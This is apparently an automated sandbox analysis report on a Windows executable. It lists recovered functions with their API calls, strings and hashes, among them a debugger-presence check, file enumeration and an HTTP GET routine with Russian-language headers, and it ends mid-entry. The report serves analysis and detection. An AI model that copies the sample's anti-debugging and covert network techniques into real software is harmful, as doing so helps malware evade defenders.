SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004A3FBA
UnhandledExceptionFilter.KERNEL32(004CAA20), ref: 004A3FC5
GetCurrentProcess.KERNEL32(C0000409), ref: 004A3FE1
TerminateProcess.KERNEL32(00000000), ref: 004A3FE8

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a1cbacf515a335a5c430014b32b0a7ce29cac7cb6989442224b1cd5798641b65
Instruction ID: 51dd710800ac61ef576a00a662d96e3d5ce41a6d41c32ef2e54d8f28d7573895
Opcode Fuzzy Hash: a1cbacf515a335a5c430014b32b0a7ce29cac7cb6989442224b1cd5798641b65
Instruction Fuzzy Hash: 4A21E574922214DFC700DF69E944A543BA4FB19704F12407BE549C73B0EB796980CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0343D530, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 034441F5
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0344420A
UnhandledExceptionFilter.KERNEL32(004CAA20), ref: 03444215
GetCurrentProcess.KERNEL32(C0000409), ref: 03444231
TerminateProcess.KERNEL32(00000000), ref: 03444238

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a1cbacf515a335a5c430014b32b0a7ce29cac7cb6989442224b1cd5798641b65
Instruction ID: 5610ab38d96447a8a63722623c956eee432c4db6b67c90f6ba085325d014091a
Opcode Fuzzy Hash: a1cbacf515a335a5c430014b32b0a7ce29cac7cb6989442224b1cd5798641b65
Instruction Fuzzy Hash: 1021D2B89223149FD710DF69F9446543BA4FB08704F52807BE94887371EB756A81CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 03437E80, Relevance: 4.6, APIs: 3, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03437AE0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,03437EEA,?,?,004D479C), ref: 03437B0B
Part of subcall function 03437AE0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 03437B3E

FindFirstFileW.KERNEL32(00000000,?,?,?,004D479C), ref: 03437EFC
FindNextFileW.KERNEL32(?,?), ref: 03437FAB
FindNextFileW.KERNEL32(?,?,?,?,?), ref: 03438039

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: FileFind$ByteCharMultiNextWide$First
String ID:
API String ID: 1501163664-0
Opcode ID: 52760062e223aa5f0c31d6ce8296739a4c809040d19cf6a2c78a95b7460b592d
Instruction ID: f7da0952b38d9f978e445e7006caa345010cc11fe34559ee946e970a6c859fe3
Opcode Fuzzy Hash: 52760062e223aa5f0c31d6ce8296739a4c809040d19cf6a2c78a95b7460b592d
Instruction Fuzzy Hash: FB514BB59083819FD724DF69D884A9BFBE8FFD9300F444A2EE4898B250EB74D504CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0344E167, Relevance: 4.6, APIs: 3, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0344E7A4,?,03442A7C,?,000000BC,?,00000001,00000000,00000000), ref: 0344E1A6
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0344E7A4,?,03442A7C,?,000000BC,?,00000001,00000000,00000000), ref: 0344E1CF
GetACP.KERNEL32(?,?,0344E7A4,?,03442A7C,?,000000BC,?,00000001,00000000), ref: 0344E1E3

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8c40b96515094ee226d9d8ca6a380f8fd7f47d13b63451fc0d6a4228075fdbcd
Instruction ID: 6d8b90954bedf05a3460302f996cc7f4e2ed67948e378eb8df625413b2ef609d
Opcode Fuzzy Hash: 8c40b96515094ee226d9d8ca6a380f8fd7f47d13b63451fc0d6a4228075fdbcd
Instruction Fuzzy Hash: C201DF3178030ABEFB11DB66EC45F5BB6ACBB01618F28417BF501ED1C0EB60DA81969D

Uniqueness

Uniqueness Score: -1.00%

Function 033A092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 033A0966
., xrefs: 033A095F
GetProcAddress., xrefs: 033A09DC, 033A09DF, 033A09E4

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 45c8e46e2c58ae183aee55556abaa639103a17e1f4c54f25e9f9b8adfc504a29
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: F1316CB6904609DFDB14CF99C880AAEFBF9FF48324F14414AD841AB720D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0049E6F0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: b0a3894833babbc0a0a82ab257eaf25fae8757ccc0945901ce8d3c1e6241187e
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 15115E7B20008183DE14C6EFD8F86B79F96EBD632072C43FBC1414B744E12AD945950A

Uniqueness

Uniqueness Score: -1.00%

Function 0343E940, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 3880df58a1d729d070bc7f24d2d8b251ef4079fbd6dddbe7bbb413e07969f903
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 4511967720215183D694CA2ED9B85B7D795EECF12172D427BE1C14F758E122D1C59F08

Uniqueness

Uniqueness Score: -1.00%

Function 004998E0, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba3c1d4961ccca4f54f99c1930a6c8bb7702a748e9084198eccb3e93d3a9d827
Instruction ID: 2617f62d85a7f7831f4b2edacf601b8c8144001a51ba7f324194766a5ca5e40a
Opcode Fuzzy Hash: ba3c1d4961ccca4f54f99c1930a6c8bb7702a748e9084198eccb3e93d3a9d827
Instruction Fuzzy Hash: 5A219D335784F751E7808B36CC49A326BD3CBCA206F6F81B9D68687242D23ED803D265

Uniqueness

Uniqueness Score: -1.00%

Function 033A0D90, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: 97689b0abd064734e3f2c6c9fabbe623300c9b481f6512eede6a519b8be5c998
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 12F0CD7BA11A049FDB25CF28CC85BAE73F9FB89215F0841A4D80AD7242D330E9428B90

Uniqueness

Uniqueness Score: -1.00%

Function 00404D80, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 334COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404DD2
std::_Xinvalid_argument.LIBCPMT ref: 00404DF4
_memmove.LIBCMT ref: 00404E52
_memmove.LIBCMT ref: 00404E79
_memmove.LIBCMT ref: 00404E8E
_memmove.LIBCMT ref: 00404EBE
_memmove.LIBCMT ref: 00405059
std::_Xinvalid_argument.LIBCPMT ref: 0040508F

Strings

invalid string position, xrefs: 0040508A
string too long, xrefs: 00404DCD, 00404DEF

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 1c580661010024c19eca9f7e2565e130f23d75681798bf8c275f2654b42415db
Instruction ID: a8591f4d376f1940f14495717f4e777cabbcfcdccd496d4669894329b8321a18
Opcode Fuzzy Hash: 1c580661010024c19eca9f7e2565e130f23d75681798bf8c275f2654b42415db
Instruction Fuzzy Hash: 7CA16DB17146418BDB28DE18CD9492FB3A6EBC5704768093EF582E77C1C638EC458B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404940, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 305COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404982
std::_Xinvalid_argument.LIBCPMT ref: 004049A0
_memmove.LIBCMT ref: 00404A0D
_memmove.LIBCMT ref: 00404A3F
std::_Xinvalid_argument.LIBCPMT ref: 00404AB3
std::_Xinvalid_argument.LIBCPMT ref: 00404B28
std::_Xinvalid_argument.LIBCPMT ref: 00404B40
std::_Xinvalid_argument.LIBCPMT ref: 00404B5A
_memmove.LIBCMT ref: 00404BC4
_memmove.LIBCMT ref: 00404BE1

Strings

invalid string position, xrefs: 00404AAE, 00404B23
string too long, xrefs: 0040497D, 0040499B, 00404B3B, 00404B55

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 103270a314c84c235e197748bde36e9ee9501a2353c3714e00be45ed75851f06
Instruction ID: 89e6c79947382093bc65bab98b18f58752e4510f9c535b15dbac0ad3bd86c01e
Opcode Fuzzy Hash: 103270a314c84c235e197748bde36e9ee9501a2353c3714e00be45ed75851f06
Instruction Fuzzy Hash: 2191A1B13042008BDB24DE5CD980A6BF7AAEBD1714B200A3FE292D76C1D778EC45876D

Uniqueness

Uniqueness Score: -1.00%

Function 00416110, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 203networkCOMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 004161E5
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 00416203
InternetSetOptionA.WININET ref: 00416225
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 0041624F
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00400000,00000001), ref: 0041627D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041629A
InternetCloseHandle.WININET(00000000), ref: 004162B1

Part of subcall function 00415DD0: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00415E41
Part of subcall function 00415DD0: InternetReadFile.WININET(?,?,000003E8,?), ref: 00415E62
Part of subcall function 00415DD0: _memmove.LIBCMT ref: 00415E9D
Part of subcall function 00415DD0: _memset.LIBCMT ref: 00415ED7
Part of subcall function 00415DD0: HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 00415EED

InternetCloseHandle.WININET(00000000), ref: 004162B8
InternetCloseHandle.WININET(00000000), ref: 004162C4

Part of subcall function 00415C80: HttpAddRequestHeadersA.WININET(?,5EBFF6FD,?,20000000), ref: 00415D00
Part of subcall function 00415C80: HttpAddRequestHeadersA.WININET(?,5EBFF6FD,?,20000000), ref: 00415D30
Part of subcall function 00415C80: HttpAddRequestHeadersA.WININET(?,5EBFF6FD,?,20000000), ref: 00415D60
Part of subcall function 00415C80: HttpAddRequestHeadersA.WININET(?,5EBFF6FD,?,20000000), ref: 00415D90

Strings

http://, xrefs: 00416177
/, xrefs: 004161A6
GET, xrefs: 00416277

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$Http$Request$Headers$CloseHandle$FileOpen$ConnectInfoOptionPointerQueryReadSend__cftof_memmove_memset
String ID: /$GET$http://
API String ID: 3181371185-2325301807
Opcode ID: 81dcce950c12420913257624e2549386965b58cbb4564fd47c5696ce42bb7cc5
Instruction ID: a04099358c9060af61aabdbd50b6104f086ff8df9c668dbb0fc4616c749487f9
Opcode Fuzzy Hash: 81dcce950c12420913257624e2549386965b58cbb4564fd47c5696ce42bb7cc5
Instruction Fuzzy Hash: F261C571508344AFD710EB65CC85F6BB7E8EB84704F10093FF59697281E7B9E9448B1A

Uniqueness

Uniqueness Score: -1.00%

Function 033B6360, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 203networkCOMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 033B6435
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 033B6453
InternetSetOptionA.WININET ref: 033B6475
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 033B649F
HttpOpenRequestA.WININET(00000000,004BFBF8,?,00000000,00000000,00000000,00400000,00000001), ref: 033B64CD
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 033B64EA
InternetCloseHandle.WININET(00000000), ref: 033B6501

Part of subcall function 033B6020: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 033B6091
Part of subcall function 033B6020: InternetReadFile.WININET(?,?,000003E8,?), ref: 033B60B2
Part of subcall function 033B6020: _memset.LIBCMT ref: 033B6127
Part of subcall function 033B6020: HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 033B613D

InternetCloseHandle.WININET(00000000), ref: 033B6508
InternetCloseHandle.WININET(00000000), ref: 033B6514

Part of subcall function 033B5ED0: HttpAddRequestHeadersA.WININET(?,004D479C,?,20000000), ref: 033B5F50
Part of subcall function 033B5ED0: HttpAddRequestHeadersA.WININET(?,004D479C,?,20000000), ref: 033B5F80
Part of subcall function 033B5ED0: HttpAddRequestHeadersA.WININET(?,004D479C,?,20000000), ref: 033B5FB0
Part of subcall function 033B5ED0: HttpAddRequestHeadersA.WININET(?,004D479C,?,20000000), ref: 033B5FE0

Strings

/, xrefs: 033B63F6

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: Internet$Http$Request$Headers$CloseHandle$FileOpen$ConnectInfoOptionPointerQueryReadSend__cftof_memset
String ID: /
API String ID: 2196755729-2043925204
Opcode ID: 833298940dd4cc96a151a038b0679c44a385b16aa2c2c1d42f8c1a361e7f5985
Instruction ID: ce78ed9dc1509264f9a8b5667cdcc8f4603bb4d29ae3ee91ecb35b4e930521a8
Opcode Fuzzy Hash: 833298940dd4cc96a151a038b0679c44a385b16aa2c2c1d42f8c1a361e7f5985
Instruction Fuzzy Hash: C5619F75608340AFD310DB64CC85FABB7F8EB89704F54092EF6869B681EBB5E5048B16

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 004181E3

Part of subcall function 0049DFF1: RaiseException.KERNEL32(#3@,?,5EBFF6FD,004BD94C,00403323,?,004CDB30,?,5EBFF6FD), ref: 0049E033

std::exception::exception.LIBCMT ref: 0041820C
__CxxThrowException@8.LIBCMT ref: 0041822B
std::exception::exception.LIBCMT ref: 0041824D
__CxxThrowException@8.LIBCMT ref: 0041826C
std::exception::exception.LIBCMT ref: 00418289
__CxxThrowException@8.LIBCMT ref: 004182A8

Strings

ios_base::eofbit set, xrefs: 00418281
ios_base::badbit set, xrefs: 00418204
ios_base::failbit set, xrefs: 00418245

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4237746311-1866435925
Opcode ID: 5e111f16edf100347f7e2026c6255a5654c5b38600168a35c7550bf677a142bc
Instruction ID: dd432415461767abbebadee0d7123ddce3f27ab956b8e48a7bd2ce5c1b16a432
Opcode Fuzzy Hash: 5e111f16edf100347f7e2026c6255a5654c5b38600168a35c7550bf677a142bc
Instruction Fuzzy Hash: 0D214FB5408340AFC744EF598442B5BFBE5BF98708F048A1FB59992291DBB8D608CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00415C80, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 93networkCOMMON

Download Yara Rule

APIs

HttpAddRequestHeadersA.WININET(?,5EBFF6FD,?,20000000), ref: 00415D00
HttpAddRequestHeadersA.WININET(?,5EBFF6FD,?,20000000), ref: 00415D30
HttpAddRequestHeadersA.WININET(?,5EBFF6FD,?,20000000), ref: 00415D60
HttpAddRequestHeadersA.WININET(?,5EBFF6FD,?,20000000), ref: 00415D90

Strings

Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00415D38
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00415CB6
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00415D08
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00415D68

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HeadersHttpRequest
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
API String ID: 1754618566-787135837
Opcode ID: 38b493c78507504198013e1fa52c7c327af53180480e6ade8422aeb970cc079b
Instruction ID: eb4060fcc1ba565b08232e6911fef0afe87c36e37f486a3217c6e1862699c994
Opcode Fuzzy Hash: 38b493c78507504198013e1fa52c7c327af53180480e6ade8422aeb970cc079b
Instruction Fuzzy Hash: 4D314C71508700AFD200DF54D845FABB7E8FBD9714F50892FF49996280D778EA08CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0049D6DC, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(004D6AB8, 0@,?,?,?,0049D7E0,?,004D1288,0000000C,0049D80C,?,?,0049DFD5,004B9571,?), ref: 0049D6F1
DecodePointer.KERNEL32(?,?,0049D7E0,?,004D1288,0000000C,0049D80C,?,?,0049DFD5,004B9571,?), ref: 0049D6FE
__realloc_crt.LIBCMT ref: 0049D73B
__realloc_crt.LIBCMT ref: 0049D751
EncodePointer.KERNEL32(00000000,?,?,0049D7E0,?,004D1288,0000000C,0049D80C,?,?,0049DFD5,004B9571,?), ref: 0049D763
EncodePointer.KERNEL32(?,?,?,0049D7E0,?,004D1288,0000000C,0049D80C,?,?,0049DFD5,004B9571,?), ref: 0049D777
EncodePointer.KERNEL32(-00000004,?,?,0049D7E0,?,004D1288,0000000C,0049D80C,?,?,0049DFD5,004B9571,?), ref: 0049D77F

Strings

0@, xrefs: 0049D6E3

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID: 0@
API String ID: 4108716018-1855383697
Opcode ID: 118c86f61b1f0ff33da3e3c7315bc405d6cebba6649133caedeafc12035ca7fd
Instruction ID: 911a15bacfc1c887e642b7b2f31c8436430de60f502d080f3c5aeb6679f2c6dd
Opcode Fuzzy Hash: 118c86f61b1f0ff33da3e3c7315bc405d6cebba6649133caedeafc12035ca7fd
Instruction Fuzzy Hash: DF11C872A00215AFDF109FA5DDC5C9A7FE9EB4536031105BBE805E3220FB79EC509A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00495150, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0049517C
std::_Lockit::_Lockit.LIBCPMT ref: 004951A2
std::bad_exception::bad_exception.LIBCMT ref: 0049522A
__CxxThrowException@8.LIBCMT ref: 00495239
std::_Lockit::_Lockit.LIBCPMT ref: 0049524E
std::locale::facet::_Facet_Register.LIBCPMT ref: 00495269

Strings

bad cast, xrefs: 00495221

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: ffed7d8bcb85b0bbe8f07397fd8880bc1e70bbbff185f4e6e1828da45a1b0dfb
Instruction ID: c33537bd79f6f845ac48f9d5f8304e6325f5cd01bec2964505ee57c99b5369b8
Opcode Fuzzy Hash: ffed7d8bcb85b0bbe8f07397fd8880bc1e70bbbff185f4e6e1828da45a1b0dfb
Instruction Fuzzy Hash: 9F31D1715057409FDB15EF24C882B5A7BE0FB55728F50067FF856972A1DB38A804CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004194A0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004194CC
std::_Lockit::_Lockit.LIBCPMT ref: 004194F2
std::bad_exception::bad_exception.LIBCMT ref: 0041957A
__CxxThrowException@8.LIBCMT ref: 00419589
std::_Lockit::_Lockit.LIBCPMT ref: 0041959E
std::locale::facet::_Facet_Register.LIBCPMT ref: 004195B9

Strings

bad cast, xrefs: 00419571

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 7cd23927a10f08ac214474c197d7eca163e4b1c6faae5de1849a991c32d5d5e0
Instruction ID: 794d5a4d2c896eb3baff24e5249792ba5868fdf11c9bc1cdce27eab32de837b5
Opcode Fuzzy Hash: 7cd23927a10f08ac214474c197d7eca163e4b1c6faae5de1849a991c32d5d5e0
Instruction Fuzzy Hash: A031D572504300AFDB55EF14D891B9A7BA1FB54724F50063FF456A32A1D738EC84CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00418E70, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00418E9C
std::_Lockit::_Lockit.LIBCPMT ref: 00418EC2
std::bad_exception::bad_exception.LIBCMT ref: 00418F4A
__CxxThrowException@8.LIBCMT ref: 00418F59
std::_Lockit::_Lockit.LIBCPMT ref: 00418F6E
std::locale::facet::_Facet_Register.LIBCPMT ref: 00418F89

Strings

bad cast, xrefs: 00418F41

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 76acf0189cdbd01fd60682db51ffaeeb1b45a871c2c3086ce1ecd9507ee6f833
Instruction ID: 9d41b346fab6e2999ce44b90ea8dcb68986cc572154284b10af2d633b4ac5cf3
Opcode Fuzzy Hash: 76acf0189cdbd01fd60682db51ffaeeb1b45a871c2c3086ce1ecd9507ee6f833
Instruction Fuzzy Hash: FF31C0715053419FDB14EF14C895BAABBA2FB94724F40062FF45293291DB3CA889CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004A30B3, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 004A30BA

Part of subcall function 004A6464: GetLastError.KERNEL32(?,?,004A3E52,0049F888,?,?,0040337B,?,5EBFF6FD), ref: 004A6468
Part of subcall function 004A6464: ___set_flsgetvalue.LIBCMT ref: 004A6476
Part of subcall function 004A6464: __calloc_crt.LIBCMT ref: 004A648A
Part of subcall function 004A6464: DecodePointer.KERNEL32(00000000,?,?,004A3E52,0049F888,?,?,0040337B,?,5EBFF6FD), ref: 004A64A4
Part of subcall function 004A6464: __initptd.LIBCMT ref: 004A64B3
Part of subcall function 004A6464: GetCurrentThreadId.KERNEL32 ref: 004A64BA
Part of subcall function 004A6464: SetLastError.KERNEL32(00000000,?,?,004A3E52,0049F888,?,?,0040337B,?,5EBFF6FD), ref: 004A64D2

__calloc_crt.LIBCMT ref: 004A30DC
__get_sys_err_msg.LIBCMT ref: 004A30FA
_strcpy_s.LIBCMT ref: 004A3102
__invoke_watson.LIBCMT ref: 004A3117

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004A30C7, 004A30EA
(1J, xrefs: 004A311D

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
String ID: (1J$Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 69636372-3210555694
Opcode ID: be7ed574f45a5c44ae74317d248a667910c589c643cf6402b8bd7bd807a679ee
Instruction ID: e3341fa3ecb13974be77911655b20bd21895dc87016530fa6df9d2650a987ca7
Opcode Fuzzy Hash: be7ed574f45a5c44ae74317d248a667910c589c643cf6402b8bd7bd807a679ee
Instruction Fuzzy Hash: 32F04CB650820457CB303D2A5C4392BB188CB6372DB11843FF60583241FA7E8D01425E

Uniqueness

Uniqueness Score: -1.00%

Function 03448205, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03448211

Part of subcall function 0344672D: __getptd_noexit.LIBCMT ref: 03446730
Part of subcall function 0344672D: __amsg_exit.LIBCMT ref: 0344673D

__amsg_exit.LIBCMT ref: 03448231
__lock.LIBCMT ref: 03448241
InterlockedDecrement.KERNEL32(?), ref: 0344825E
_free.LIBCMT ref: 03448271
InterlockedIncrement.KERNEL32(004D5198), ref: 03448289

Strings

pMM, xrefs: 03448268

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: pMM
API String ID: 3470314060-3859463463
Opcode ID: bfafcbe614a73afef912fdd6a8783f456d1fdf8c540f532868a18de0d5051fcf
Instruction ID: 303166a9db8be5a96297a9a84fbf19c69a0c754c5ca66ec0cba481595dc5ec64
Opcode Fuzzy Hash: bfafcbe614a73afef912fdd6a8783f456d1fdf8c540f532868a18de0d5051fcf
Instruction Fuzzy Hash: FF013935902F11AFEA25EB66E80475EB760BB01760F08417BE814AF390CB3568818A9E

Uniqueness

Uniqueness Score: -1.00%

Function 03442E8E, Relevance: 10.7, APIs: 7, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 03442F0F
_strncmp.LIBCMT ref: 03442F52
_strlen.LIBCMT ref: 03442F60
_strcspn.LIBCMT ref: 03442F86
__setlocale_get_all.LIBCMT ref: 03443096

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: __setlocale_get_all_strcspn_strlen_strncmp_strpbrk
String ID:
API String ID: 3252769141-0
Opcode ID: f71bab4532a1e64db66c1cb98eee1842f36f19113b0277062b272b279be8a2d5
Instruction ID: 03bb6ceeb3d5d733388b43762dda3b77bb1aacfedd8b73d358c7ce41b7741b3c
Opcode Fuzzy Hash: f71bab4532a1e64db66c1cb98eee1842f36f19113b0277062b272b279be8a2d5
Instruction Fuzzy Hash: D051D7799003155EFF30DE718C84BABB3B8AF01654F1845FBE549AF242DB7089958B28

Uniqueness

Uniqueness Score: -1.00%

Function 004050A0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

